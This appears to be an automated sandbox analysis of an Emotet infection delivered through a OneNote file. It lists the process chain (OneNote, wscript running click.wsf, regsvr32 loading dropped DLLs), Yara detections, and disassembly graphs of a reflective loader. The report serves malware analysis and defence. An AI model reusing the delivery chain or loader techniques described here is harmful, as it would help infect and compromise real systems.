                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_1.one
                                                                                                                                                                                                                  Imagebase:0x3a0000
                                                                                                                                                                                                                  File size:1676072 bytes
                                                                                                                                                                                                                  MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                  Start time:09:20:05
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                                                                                                                                  Imagebase:0xbc0000
                                                                                                                                                                                                                  File size:147456 bytes
                                                                                                                                                                                                                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.343720748.0000000005A23000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:09:20:10
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll
                                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:09:20:10
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline: "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll"
                                                                                                                                                                                                                  Imagebase:0x7ff796f70000
                                                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.315209574.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                  Start time:09:20:13
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll"
                                                                                                                                                                                                                  Imagebase:0x7ff796f70000
                                                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.559981390.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.560329835.0000000000921000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                  Start time:09:20:20
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:/tsr
                                                                                                                                                                                                                  Imagebase:0xae0000
                                                                                                                                                                                                                  File size:157872 bytes
                                                                                                                                                                                                                  MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                  Start time:09:20:28
                                                                                                                                                                                                                  Start date:17/03/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                                                                                                                                                                                                                  Imagebase:0xae0000
                                                                                                                                                                                                                  File size:157872 bytes
                                                                                                                                                                                                                  MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:8.4%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:7.5%
                                                                                                                                                                                                                    Signature Coverage:6%
                                                                                                                                                                                                                    Total number of Nodes:332
                                                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                                                    execution_graph 8532 180001184 8539 180002a30 8532->8539 8535 180001191 8548 180002d5c 8539->8548 8542 180006cf0 8573 180007f30 GetLastError 8542->8573 8544 18000119a 8544->8535 8545 180002a44 8544->8545 8634 180002cf0 8545->8634 8547 180002a4f 8547->8535 8549 18000118d 8548->8549 8550 180002d7b GetLastError 8548->8550 8549->8535 8549->8542 8560 18000479c 8550->8560 8564 1800045bc 8560->8564 8565 180004600 __vcrt_FlsAlloc 8564->8565 8566 1800046d6 TlsGetValue 8564->8566 8565->8566 8567 18000462e LoadLibraryExW 8565->8567 8568 1800046c5 GetProcAddress 8565->8568 8572 180004671 LoadLibraryExW 8565->8572 8569 1800046a5 8567->8569 8570 18000464f GetLastError 8567->8570 8568->8566 8569->8568 8571 1800046bc FreeLibrary 8569->8571 8570->8565 8571->8568 8572->8565 8572->8569 8574 180007f71 FlsSetValue 8573->8574 8577 180007f54 8573->8577 8575 180007f83 8574->8575 8576 180007f61 SetLastError 8574->8576 8590 180008714 8575->8590 8576->8544 8577->8574 8577->8576 8581 180007fb0 FlsSetValue 8584 180007fbc FlsSetValue 8581->8584 8585 180007fce 8581->8585 8582 180007fa0 FlsSetValue 8583 180007fa9 8582->8583 8597 18000878c 8583->8597 8584->8583 8603 180007b24 8585->8603 8596 180008725 __free_lconv_mon 8590->8596 8591 180008776 8611 1800086f4 8591->8611 8592 18000875a RtlAllocateHeap 8594 180007f92 8592->8594 8592->8596 8594->8581 8594->8582 8596->8591 8596->8592 8608 18000abf8 8596->8608 8598 180008791 HeapFree 8597->8598 8599 1800087c0 8597->8599 8598->8599 8600 1800087ac GetLastError 8598->8600 8599->8576 8601 1800087b9 __free_lconv_mon 8600->8601 8602 1800086f4 __free_lconv_mon 9 API calls 8601->8602 8602->8599 8620 1800079fc 8603->8620 8614 18000ac38 8608->8614 8612 180007f30 __free_lconv_mon 11 API calls 8611->8612 8613 1800086fd 8612->8613 8613->8594 8619 180008160 EnterCriticalSection 8614->8619 8632 180008160 EnterCriticalSection 8620->8632 8635 180002d04 8634->8635 8639 180002d1e __vcrt_freefls 8634->8639 8636 18000479c __vcrt_freeptd 6 API calls 8635->8636 8638 180002d0e 8635->8638 8636->8638 8640 1800047e4 8638->8640 8639->8547 8641 1800045bc __vcrt_FlsAlloc 5 API calls 8640->8641 8642 180004812 8641->8642 8643 180004824 TlsSetValue 8642->8643 8644 18000481c 8642->8644 8643->8644 8644->8639 8678 180006554 8679 180006569 8678->8679 8680 18000656d 8678->8680 8693 180009cd8 8680->8693 8685 18000658b 8720 1800065c8 8685->8720 8686 18000657f 8688 18000878c __free_lconv_mon 11 API calls 8686->8688 8688->8679 8690 18000878c __free_lconv_mon 11 API calls 8691 1800065b2 8690->8691 8692 18000878c __free_lconv_mon 11 API calls 8691->8692 8692->8679 8694 180006572 8693->8694 8695 180009ce5 8693->8695 8699 18000a234 GetEnvironmentStringsW 8694->8699 8739 180007e8c 8695->8739 8700 18000a264 8699->8700 8701 180006577 8699->8701 8702 18000a154 WideCharToMultiByte 8700->8702 8701->8685 8701->8686 8703 18000a2b5 8702->8703 8704 18000a2c7 8703->8704 8705 18000a2bc FreeEnvironmentStringsW 8703->8705 8706 18000b4c4 shared_ptr 12 API calls 8704->8706 8705->8701 8707 18000a2cf 8706->8707 8708 18000a2d7 8707->8708 8709 18000a2e0 8707->8709 8710 18000878c __free_lconv_mon 11 API calls 8708->8710 8711 18000a154 WideCharToMultiByte 8709->8711 8712 18000a2de 8710->8712 8713 18000a303 8711->8713 8712->8705 8714 18000a311 8713->8714 8715 18000a307 8713->8715 8717 18000878c __free_lconv_mon 11 API calls 8714->8717 8716 18000878c __free_lconv_mon 11 API calls 8715->8716 8718 18000a30f FreeEnvironmentStringsW 8716->8718 8717->8718 8718->8701 8721 1800065ed 8720->8721 8722 180008714 __free_lconv_mon 11 API calls 8721->8722 8735 180006623 8722->8735 8723 18000662b 8724 18000878c __free_lconv_mon 11 API calls 8723->8724 8726 180006593 8724->8726 8725 18000669e 8727 18000878c __free_lconv_mon 11 API calls 8725->8727 8726->8690 8727->8726 8728 180008714 __free_lconv_mon 11 API calls 8728->8735 8729 18000668d 9128 1800066d8 8729->9128 8733 18000878c __free_lconv_mon 11 API calls 8733->8723 8734 1800066c3 8736 1800085d8 _invalid_parameter_noinfo 17 API calls 8734->8736 8735->8723 8735->8725 8735->8728 8735->8729 8735->8734 8737 18000878c __free_lconv_mon 11 API calls 8735->8737 9119 180006e88 8735->9119 8738 1800066d6 8736->8738 8737->8735 8740 180007eb8 FlsSetValue 8739->8740 8741 180007e9d FlsGetValue 8739->8741 8743 180007eaa 8740->8743 8744 180007ec5 8740->8744 8742 180007eb2 8741->8742 8741->8743 8742->8740 8745 180007eb0 8743->8745 8782 180006e28 8743->8782 8747 180008714 __free_lconv_mon 11 API calls 8744->8747 8759 1800099b0 8745->8759 8749 180007ed4 8747->8749 8750 180007ef2 FlsSetValue 8749->8750 8751 180007ee2 FlsSetValue 8749->8751 8753 180007efe FlsSetValue 8750->8753 8754 180007f10 8750->8754 8752 180007eeb 8751->8752 8756 18000878c __free_lconv_mon 11 API calls 8752->8756 8753->8752 8755 180007b24 __free_lconv_mon 11 API calls 8754->8755 8757 180007f18 8755->8757 8756->8743 8758 18000878c __free_lconv_mon 11 API calls 8757->8758 8758->8745 8960 180009c20 8759->8960 8761 1800099e5 8975 1800096b0 8761->8975 8765 180009a13 8766 180009a1b 8765->8766 8768 180009a2a 8765->8768 8767 18000878c __free_lconv_mon 11 API calls 8766->8767 8781 180009a02 8767->8781 8768->8768 8989 180009d54 8768->8989 8771 180009b26 8772 1800086f4 __free_lconv_mon 11 API calls 8771->8772 8775 180009b2b 8772->8775 8773 180009b40 8774 180009b81 8773->8774 8778 18000878c __free_lconv_mon 11 API calls 8773->8778 8776 180009be8 8774->8776 9000 1800094e0 8774->9000 8777 18000878c __free_lconv_mon 11 API calls 8775->8777 8780 18000878c __free_lconv_mon 11 API calls 8776->8780 8777->8781 8778->8774 8780->8781 8781->8694 8791 18000acb8 8782->8791 8825 18000ac70 8791->8825 8830 180008160 EnterCriticalSection 8825->8830 8961 180009c43 8960->8961 8962 180009c4d 8961->8962 9015 180008160 EnterCriticalSection 8961->9015 8964 180009cbf 8962->8964 8967 180006e28 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 8962->8967 8964->8761 8970 180009cd7 8967->8970 8969 180009d2a 8969->8761 8970->8969 8972 180007e8c 52 API calls 8970->8972 8973 180009d14 8972->8973 8974 1800099b0 67 API calls 8973->8974 8974->8969 9016 1800091fc 8975->9016 8978 1800096e2 8980 1800096e7 GetACP 8978->8980 8981 1800096f7 8978->8981 8979 1800096d0 GetOEMCP 8979->8981 8980->8981 8981->8781 8982 18000b4c4 8981->8982 8983 18000b50f 8982->8983 8987 18000b4d3 __free_lconv_mon 8982->8987 8984 1800086f4 __free_lconv_mon 11 API calls 8983->8984 8986 18000b50d 8984->8986 8985 18000b4f6 HeapAlloc 8985->8986 8985->8987 8986->8765 8987->8983 8987->8985 8988 18000abf8 __free_lconv_mon 2 API calls 8987->8988 8988->8987 8990 1800096b0 49 API calls 8989->8990 8991 180009d81 8990->8991 8992 180009ed7 8991->8992 8993 180009dbe IsValidCodePage 8991->8993 8999 180009dd8 __FrameHandler3::FrameUnwindToEmptyState 8991->8999 8994 1800010b0 _log10_special 8 API calls 8992->8994 8993->8992 8995 180009dcf 8993->8995 8996 180009b1d 8994->8996 8997 180009dfe GetCPInfo 8995->8997 8995->8999 8996->8771 8996->8773 8997->8992 8997->8999 9032 1800097c8 8999->9032 9118 180008160 EnterCriticalSection 9000->9118 9017 18000921b 9016->9017 9018 180009220 9016->9018 9017->8978 9017->8979 9018->9017 9019 180007db8 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 9018->9019 9020 18000923b 9019->9020 9024 18000b524 9020->9024 9025 18000b539 9024->9025 9026 18000925e 9024->9026 9025->9026 9027 18000bfb4 _invalid_parameter_noinfo 47 API calls 9025->9027 9028 18000b590 9026->9028 9027->9026 9029 18000b5a5 9028->9029 9030 18000b5b8 9028->9030 9029->9030 9031 180009d38 _invalid_parameter_noinfo 47 API calls 9029->9031 9030->9017 9031->9030 9033 180009805 GetCPInfo 9032->9033 9042 1800098fb 9032->9042 9034 180009818 9033->9034 9033->9042 9043 18000caa4 9034->9043 9035 1800010b0 _log10_special 8 API calls 9036 18000999a 9035->9036 9036->8992 9042->9035 9044 1800091fc 47 API calls 9043->9044 9045 18000cae6 9044->9045 9063 18000a0c4 9045->9063 9065 18000a0cd MultiByteToWideChar 9063->9065 9120 180006e9f 9119->9120 9121 180006e95 9119->9121 9122 1800086f4 __free_lconv_mon 11 API calls 9120->9122 9121->9120 9126 180006eba 9121->9126 9123 180006ea6 9122->9123 9124 1800085b8 _invalid_parameter_noinfo 47 API calls 9123->9124 9125 180006eb2 9124->9125 9125->8735 9126->9125 9127 1800086f4 __free_lconv_mon 11 API calls 9126->9127 9127->9123 9129 180006695 9128->9129 9130 1800066dd 9128->9130 9129->8733 9131 180006706 9130->9131 9132 18000878c __free_lconv_mon 11 API calls 9130->9132 9133 18000878c __free_lconv_mon 11 API calls 9131->9133 9132->9130 9133->9129 9134 25880cc 9135 25880f3 9134->9135 9136 25882ba 9135->9136 9138 259e9e8 9135->9138 9141 2588bc8 9138->9141 9140 259eab4 9140->9135 9143 2588c02 9141->9143 9142 2588eb8 9142->9140 9143->9142 9144 2588d6f Process32FirstW 9143->9144 9144->9143 8645 c70000 8648 c7015a 8645->8648 8646 c7033f GetNativeSystemInfo 8647 c70377 VirtualAlloc 8646->8647 8652 c708eb 8646->8652 8649 c70395 VirtualAlloc 8647->8649 8650 c703aa 8647->8650 8648->8646 8648->8652 8649->8650 8651 c70873 8650->8651 8654 c7084b VirtualProtect 8650->8654 8651->8652 8653 c708c6 RtlAddFunctionTable 8651->8653 8653->8652 8654->8650 9145 180001138 9146 180001141 __scrt_acquire_startup_lock 9145->9146 9148 180001145 9146->9148 9149 1800063cc 9146->9149 9150 1800063ec 9149->9150 9151 180006403 9149->9151 9152 1800063f4 9150->9152 9153 18000640a 9150->9153 9151->9148 9154 1800086f4 __free_lconv_mon 11 API calls 9152->9154 9155 180009cd8 67 API calls 9153->9155 9156 1800063f9 9154->9156 9157 18000640f 9155->9157 9158 1800085b8 _invalid_parameter_noinfo 47 API calls 9156->9158 9181 1800093bc GetModuleFileNameW 9157->9181 9158->9151 9165 180006481 9167 1800086f4 __free_lconv_mon 11 API calls 9165->9167 9166 180006499 9168 1800061a4 47 API calls 9166->9168 9169 180006486 9167->9169 9174 1800064b5 9168->9174 9170 18000878c __free_lconv_mon 11 API calls 9169->9170 9172 180006494 9170->9172 9171 1800064bb 9173 18000878c __free_lconv_mon 11 API calls 9171->9173 9172->9151 9173->9151 9174->9171 9175 1800064e7 9174->9175 9176 180006500 9174->9176 9177 18000878c __free_lconv_mon 11 API calls 9175->9177 9179 18000878c __free_lconv_mon 11 API calls 9176->9179 9178 1800064f0 9177->9178 9180 18000878c __free_lconv_mon 11 API calls 9178->9180 9179->9171 9180->9172 9182 180009401 GetLastError 9181->9182 9183 180009415 9181->9183 9205 180008668 9182->9205 9184 1800091fc 47 API calls 9183->9184 9186 180009443 9184->9186 9192 180009454 9186->9192 9210 18000a5f0 9186->9210 9187 18000940e 9188 1800010b0 _log10_special 8 API calls 9187->9188 9191 180006426 9188->9191 9193 1800061a4 9191->9193 9213 1800092a0 9192->9213 9195 1800061e2 9193->9195 9197 18000624e 9195->9197 9227 18000a088 9195->9227 9196 18000633f 9199 18000636c 9196->9199 9197->9196 9198 18000a088 47 API calls 9197->9198 9198->9197 9200 1800063bc 9199->9200 9201 180006384 9199->9201 9200->9165 9200->9166 9201->9200 9202 180008714 __free_lconv_mon 11 API calls 9201->9202 9203 1800063b2 9202->9203 9204 18000878c __free_lconv_mon 11 API calls 9203->9204 9204->9200 9206 180007f30 __free_lconv_mon 11 API calls 9205->9206 9207 180008675 __free_lconv_mon 9206->9207 9208 180007f30 __free_lconv_mon 11 API calls 9207->9208 9209 180008697 9208->9209 9209->9187 9211 18000a3dc 5 API calls 9210->9211 9212 18000a610 9211->9212 9212->9192 9214 1800092df 9213->9214 9217 1800092c4 9213->9217 9215 18000a154 WideCharToMultiByte 9214->9215 9221 1800092e4 9214->9221 9216 18000933b 9215->9216 9218 180009342 GetLastError 9216->9218 9216->9221 9222 18000936d 9216->9222 9217->9187 9220 180008668 11 API calls 9218->9220 9219 1800086f4 __free_lconv_mon 11 API calls 9219->9217 9223 18000934f 9220->9223 9221->9217 9221->9219 9224 18000a154 WideCharToMultiByte 9222->9224 9225 1800086f4 __free_lconv_mon 11 API calls 9223->9225 9226 180009394 9224->9226 9225->9217 9226->9217 9226->9218 9228 18000a014 9227->9228 9229 1800091fc 47 API calls 9228->9229 9230 18000a038 9229->9230 9230->9195 8655 180010a8e ExitProcess 8658 180014c90 LoadStringW LoadStringW 8655->8658 8667 1800109d0 LoadCursorW RegisterClassExW 8658->8667 8660 180014cec 8668 180010910 CreateWindowExW 8660->8668 8662 180014cfa 8663 180014d02 GetMessageW 8662->8663 8664 180010ab3 8662->8664 8663->8664 8665 180014d19 TranslateAcceleratorW 8663->8665 8665->8662 8666 180014d2f TranslateMessage DispatchMessageW 8665->8666 8666->8662 8667->8660 8669 1800109a1 ShowWindow UpdateWindow 8668->8669 8670 18001099d 8668->8670 8669->8670 8670->8662 8671 2584214 8672 2584256 8671->8672 8675 2593988 8672->8675 8674 25844c6 8677 2593a29 8675->8677 8676 2593acc CreateProcessW 8676->8674 8677->8676

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00C70000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 c70000-c7029a call c7091c * 2 13 c70905 0->13 14 c702a0-c702a4 0->14 15 c70907-c7091a 13->15 14->13 16 c702aa-c702ae 14->16 16->13 17 c702b4-c702b8 16->17 17->13 18 c702be-c702c5 17->18 18->13 19 c702cb-c702dc 18->19 19->13 20 c702e2-c702eb 19->20 20->13 21 c702f1-c702fc 20->21 21->13 22 c70302-c70312 21->22 23 c70314-c7031a 22->23 24 c7033f-c70371 GetNativeSystemInfo 22->24 26 c7031c-c70324 23->26 24->13 25 c70377-c70393 VirtualAlloc 24->25 29 c70395-c703a8 VirtualAlloc 25->29 30 c703aa-c703ae 25->30 27 c70326-c7032a 26->27 28 c7032c-c7032d 26->28 31 c7032f-c7033d 27->31 28->31 29->30 32 c703b0-c703c2 30->32 33 c703dc-c703e3 30->33 31->24 31->26 34 c703d4-c703d8 32->34 35 c703e5-c703f9 33->35 36 c703fb-c70417 33->36 37 c703c4-c703d1 34->37 38 c703da 34->38 35->35 35->36 39 c70419-c7041a 36->39 40 c70458-c70465 36->40 37->34 38->36 43 c7041c-c70422 39->43 41 c70537-c70542 40->41 42 c7046b-c70472 40->42 46 c706e6-c706ed 41->46 47 c70548-c70559 41->47 42->41 48 c70478-c70485 42->48 44 c70424-c70446 43->44 45 c70448-c70456 43->45 44->44 44->45 45->40 45->43 51 c706f3-c70707 46->51 52 c707ac-c707c3 46->52 49 c70562-c70565 47->49 48->41 50 c7048b-c7048f 48->50 53 c70567-c70574 49->53 54 c7055b-c7055f 49->54 55 c7051b-c70525 50->55 56 c7070d 51->56 57 c707a9-c707aa 51->57 58 c7087a-c7088d 52->58 59 c707c9-c707cd 52->59 62 c7060d-c70619 53->62 63 c7057a-c7057d 53->63 54->49 60 c70494-c704a8 55->60 61 c7052b-c70531 55->61 64 c70712-c70736 56->64 57->52 80 c708b3-c708ba 58->80 81 c7088f-c7089a 58->81 65 c707d0-c707d3 59->65 66 c704cf-c704d3 60->66 67 c704aa-c704cd 60->67 61->41 61->50 72 c706e2-c706e3 62->72 73 c7061f 62->73 63->62 68 c70583-c7059b 63->68 93 c70796-c7079f 64->93 94 c70738-c7073e 64->94 70 c7085f-c7086d 65->70 71 c707d9-c707e9 65->71 76 c704d5-c704e1 66->76 77 c704e3-c704e7 66->77 75 c70518-c70519 67->75 68->62 78 c7059d-c7059e 68->78 70->65 74 c70873-c70874 70->74 82 c7080d-c7080f 71->82 83 c707eb-c707ed 71->83 72->46 84 c70625-c70648 73->84 74->58 75->55 89 c70511-c70515 76->89 91 c704fe-c70502 77->91 92 c704e9-c704fc 77->92 90 c705a0-c70605 78->90 85 c708bc-c708c4 80->85 86 c708eb-c70903 80->86 95 c708ab-c708b1 81->95 87 c70822-c7082b 82->87 88 c70811-c70820 82->88 96 c707ef-c707f9 83->96 97 c707fb-c7080b 83->97 107 c706b2-c706b7 84->107 108 c7064a-c7064b 84->108 85->86 99 c708c6-c708e9 RtlAddFunctionTable 85->99 86->15 102 c7082e-c7083d 87->102 88->102 89->75 90->90 103 c70607 90->103 91->75 101 c70504-c7050e 91->101 92->89 93->64 100 c707a5-c707a6 93->100 104 c70740-c70746 94->104 105 c70748-c70754 94->105 95->80 106 c7089c-c708a8 95->106 96->102 97->102 99->86 100->57 101->89 109 c7083f-c70845 102->109 110 c7084b-c7085c VirtualProtect 102->110 103->62 112 c7077b-c7078d 104->112 113 c70756-c70757 105->113 114 c70764-c70776 105->114 106->95 116 c706ce-c706d8 107->116 117 c706b9-c706bd 107->117 115 c7064e-c70651 108->115 109->110 110->70 112->93 126 c7078f-c70794 112->126 119 c70759-c70762 113->119 114->112 120 c70653-c70659 115->120 121 c7065b-c70666 115->121 116->84 123 c706de-c706df 116->123 117->116 124 c706bf-c706c3 117->124 119->114 119->119 125 c7068d-c706a3 120->125 127 c70676-c70688 121->127 128 c70668-c70669 121->128 123->72 124->116 129 c706c5 124->129 132 c706a5-c706aa 125->132 133 c706ac 125->133 126->94 127->125 130 c7066b-c70674 128->130 129->116 130->127 130->130 132->115 133->107
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.314988780.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c70000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                                    • API String ID: 394283112-3605381585
                                                                                                                                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction ID: 0218b64e9c6960443ed83037b31a0d474726dc8683550aef54f351e04d82f181
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9520330618B48CBD719DF18D8856BAB7E1FB94304F24862DE89FC7251DB34E946CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259709C Relevance: 11.5, Strings: 9, Instructions: 237COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                                                                                                                                    • API String ID: 0-383957222
                                                                                                                                                                                                                    • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                                    • Instruction ID: 805cb3e0088b73d913b934e5206e22d8a3d0da2330e13e45d8b8162eb2ac6879
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58C1CD71519780AFD388CF28C58A91BBBF1FBD4754F906A1DF89686260D7B4D909CF02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78librarymemorynativeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AccessAllocateFindMemoryResourceResource_Virtual
